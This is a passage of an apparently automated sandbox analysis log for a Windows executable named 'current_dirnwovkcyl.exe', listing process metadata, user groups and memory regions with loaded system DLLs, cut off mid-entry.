# Flog Txt Version 1 # Analyzer Version: 2.4.0 # Analyzer Build Date: Jul 24 2018 18:08:56 # Log Creation Date: 03.10.2018 03:03:36.637 Process: id = "1" image_name = "current_dirnwovkcyl.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe" page_root = "0x2f3a9000" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8 start_va = 0x400000 end_va = 0x53efff entry_point = 0x400000 region_type = mapped_file name = "current_dirnwovkcyl.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe") Region: id = 9 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 16 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 164 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 165 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 166 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 167 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 168 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 169 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 170 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 246 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 247 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 248 start_va = 0x74990000 end_va = 0x74a20fff entry_point = 0x74990000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 249 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 250 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 251 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 252 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 253 start_va = 0x640000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 254 start_va = 0x680000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 255 start_va = 0x74860000 end_va = 0x7487bfff entry_point = 0x74860000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 256 start_va = 0x74880000 end_va = 0x7489afff entry_point = 0x74880000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 257 start_va = 0x748a0000 end_va = 0x748a9fff entry_point = 0x748a0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 258 start_va = 0x748b0000 end_va = 0x748bffff entry_point = 0x748b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 259 start_va = 0x748c0000 end_va = 0x748d2fff entry_point = 0x748c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 260 start_va = 0x748e0000 end_va = 0x748e7fff entry_point = 0x748e0000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 261 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 262 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 263 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 264 start_va = 0x74ac0000 end_va = 0x74ac6fff entry_point = 0x74ac0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 265 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 266 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 267 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 268 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 269 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 270 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 271 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 272 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 273 start_va = 0x76ce0000 end_va = 0x76d71fff entry_point = 0x76ce0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 274 start_va = 0x76ed0000 end_va = 0x76f2bfff entry_point = 0x76ed0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 275 start_va = 0x76f30000 end_va = 0x77019fff entry_point = 0x76f30000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 276 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 277 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 278 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 279 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 280 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 281 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 282 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 283 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 284 start_va = 0x780000 end_va = 0x907fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 285 start_va = 0x930000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 286 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 287 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 288 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 289 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 290 start_va = 0x940000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 291 start_va = 0xad0000 end_va = 0x1ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 292 start_va = 0x1ed0000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 293 start_va = 0x2010000 end_va = 0x2346fff entry_point = 0x2010000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 294 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 295 start_va = 0x2350000 end_va = 0x238ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 296 start_va = 0x2390000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 297 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 298 start_va = 0x910000 end_va = 0x920fff entry_point = 0x910000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 319 start_va = 0x74810000 end_va = 0x7485dfff entry_point = 0x74810000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 320 start_va = 0x74780000 end_va = 0x74803fff entry_point = 0x74780000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 321 start_va = 0x74750000 end_va = 0x7477ffff entry_point = 0x74750000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 322 start_va = 0x74740000 end_va = 0x74747fff entry_point = 0x74740000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 420 start_va = 0x746c0000 end_va = 0x74705fff entry_point = 0x746c0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 421 start_va = 0x746b0000 end_va = 0x746b7fff entry_point = 0x746b0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 422 start_va = 0x746a0000 end_va = 0x746a7fff entry_point = 0x746a0000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 423 start_va = 0x74690000 end_va = 0x74696fff entry_point = 0x74690000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 424 start_va = 0x74680000 end_va = 0x74686fff entry_point = 0x74680000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 426 start_va = 0x7fb20000 end_va = 0x7feaffff entry_point = 0x7fb20000 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 757 start_va = 0x74620000 end_va = 0x74632fff entry_point = 0x74620000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 765 start_va = 0x745f0000 end_va = 0x7461efff entry_point = 0x745f0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 766 start_va = 0x2350000 end_va = 0x238ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 767 start_va = 0x2390000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 768 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 769 start_va = 0x2350000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 786 start_va = 0x2490000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 787 start_va = 0x24d0000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 788 start_va = 0x25d0000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 789 start_va = 0x2610000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 790 start_va = 0x7fdf0000 end_va = 0x7fe9ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdf0000" filename = "" Region: id = 791 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 792 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 793 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 794 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 795 start_va = 0x7fdf0000 end_va = 0x7fe9ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdf0000" filename = "" Region: id = 796 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 797 start_va = 0x7fd90000 end_va = 0x7fdeffff entry_point = 0x0 region_type = private name = "private_0x000000007fd90000" filename = "" Region: id = 798 start_va = 0x7fd30000 end_va = 0x7fd8ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd30000" filename = "" Region: id = 799 start_va = 0x640000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 976 start_va = 0x2710000 end_va = 0x274ffff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 977 start_va = 0x2750000 end_va = 0x284ffff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 978 start_va = 0x2850000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 979 start_va = 0x2890000 end_va = 0x298ffff entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 980 start_va = 0x2990000 end_va = 0x29cffff entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 981 start_va = 0x29d0000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 982 start_va = 0x2ad0000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 983 start_va = 0x2b10000 end_va = 0x2c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 984 start_va = 0x2c10000 end_va = 0x2c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c10000" filename = "" Region: id = 985 start_va = 0x2c50000 end_va = 0x2d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 986 start_va = 0x2d50000 end_va = 0x2d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 987 start_va = 0x2d90000 end_va = 0x2e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 988 start_va = 0x2e90000 end_va = 0x2ecffff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 989 start_va = 0x2ed0000 end_va = 0x2fcffff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 990 start_va = 0x2fd0000 end_va = 0x300ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 991 start_va = 0x3010000 end_va = 0x310ffff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 992 start_va = 0x3110000 end_va = 0x314ffff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 993 start_va = 0x3150000 end_va = 0x324ffff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 994 start_va = 0x3250000 end_va = 0x328ffff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 995 start_va = 0x3290000 end_va = 0x338ffff entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 996 start_va = 0x3390000 end_va = 0x33cffff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 997 start_va = 0x33d0000 end_va = 0x34cffff entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 998 start_va = 0x34d0000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 999 start_va = 0x3510000 end_va = 0x360ffff entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 1000 start_va = 0x3610000 end_va = 0x364ffff entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 1001 start_va = 0x3650000 end_va = 0x374ffff entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 1002 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1003 start_va = 0x7fe86000 end_va = 0x7fe88fff entry_point = 0x0 region_type = private name = "private_0x000000007fe86000" filename = "" Region: id = 1004 start_va = 0x7fe89000 end_va = 0x7fe8bfff entry_point = 0x0 region_type = private name = "private_0x000000007fe89000" filename = "" Region: id = 1005 start_va = 0x7fe8c000 end_va = 0x7fe8efff entry_point = 0x0 region_type = private name = "private_0x000000007fe8c000" filename = "" Region: id = 1006 start_va = 0x7fe8f000 end_va = 0x7fe91fff entry_point = 0x0 region_type = private name = "private_0x000000007fe8f000" filename = "" Region: id = 1007 start_va = 0x7fe92000 end_va = 0x7fe94fff entry_point = 0x0 region_type = private name = "private_0x000000007fe92000" filename = "" Region: id = 1008 start_va = 0x7fe95000 end_va = 0x7fe97fff entry_point = 0x0 region_type = private name = "private_0x000000007fe95000" filename = "" Region: id = 1009 start_va = 0x7fe98000 end_va = 0x7fe9afff entry_point = 0x0 region_type = private name = "private_0x000000007fe98000" filename = "" Region: id = 1010 start_va = 0x7fe9b000 end_va = 0x7fe9dfff entry_point = 0x0 region_type = private name = "private_0x000000007fe9b000" filename = "" Region: id = 1011 start_va = 0x7fe9e000 end_va = 0x7fea0fff entry_point = 0x0 region_type = private name = "private_0x000000007fe9e000" filename = "" Region: id = 1012 start_va = 0x7fea1000 end_va = 0x7fea3fff entry_point = 0x0 region_type = private name = "private_0x000000007fea1000" filename = "" Region: id = 1013 start_va = 0x7fea4000 end_va = 0x7fea6fff entry_point = 0x0 region_type = private name = "private_0x000000007fea4000" filename = "" Region: id = 1014 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 1015 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1016 start_va = 0x7fdc0000 end_va = 0x7fe2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fdc0000" filename = "" Region: id = 1017 start_va = 0x7fd40000 end_va = 0x7fdbffff entry_point = 0x0 region_type = private name = "private_0x000000007fd40000" filename = "" Region: id = 1018 start_va = 0x7fca0000 end_va = 0x7fd3ffff entry_point = 0x0 region_type = private name = "private_0x000000007fca0000" filename = "" Region: id = 1019 start_va = 0x7fd40000 end_va = 0x7fd6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fd40000" filename = "" Region: id = 1020 start_va = 0x7fe30000 end_va = 0x7fe4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1021 start_va = 0x7fe50000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe50000" filename = "" Region: id = 1066 start_va = 0x7fd70000 end_va = 0x7fdaffff entry_point = 0x0 region_type = private name = "private_0x000000007fd70000" filename = "" Region: id = 1067 start_va = 0x7fdb0000 end_va = 0x7fdbffff entry_point = 0x0 region_type = private name = "private_0x000000007fdb0000" filename = "" Region: id = 1068 start_va = 0x7fb30000 end_va = 0x7fc9ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb30000" filename = "" Region: id = 1069 start_va = 0x7fcd0000 end_va = 0x7fdbffff entry_point = 0x0 region_type = private name = "private_0x000000007fcd0000" filename = "" Region: id = 1070 start_va = 0x7fdc0000 end_va = 0x7fdfffff entry_point = 0x0 region_type = private name = "private_0x000000007fdc0000" filename = "" Region: id = 1071 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1072 start_va = 0x7fac0000 end_va = 0x7fb2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fac0000" filename = "" Region: id = 1073 start_va = 0x7fa30000 end_va = 0x7fabffff entry_point = 0x0 region_type = private name = "private_0x000000007fa30000" filename = "" Region: id = 1074 start_va = 0x7fca0000 end_va = 0x7fccffff entry_point = 0x0 region_type = private name = "private_0x000000007fca0000" filename = "" Region: id = 1075 start_va = 0x7fac0000 end_va = 0x7faeffff entry_point = 0x0 region_type = private name = "private_0x000000007fac0000" filename = "" Region: id = 1076 start_va = 0x7faf0000 end_va = 0x7fb1ffff entry_point = 0x0 region_type = private name = "private_0x000000007faf0000" filename = "" Region: id = 1077 start_va = 0x7fb20000 end_va = 0x7fb2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb20000" filename = "" Region: id = 1078 start_va = 0x7f8f0000 end_va = 0x7fa2ffff entry_point = 0x0 region_type = private name = "private_0x000000007f8f0000" filename = "" Region: id = 1079 start_va = 0x7fcd0000 end_va = 0x7fd3ffff entry_point = 0x0 region_type = private name = "private_0x000000007fcd0000" filename = "" Region: id = 1080 start_va = 0x7fe30000 end_va = 0x7fe7ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe30000" filename = "" Region: id = 1113 start_va = 0x7fd40000 end_va = 0x7fdcffff entry_point = 0x0 region_type = private name = "private_0x000000007fd40000" filename = "" Region: id = 1139 start_va = 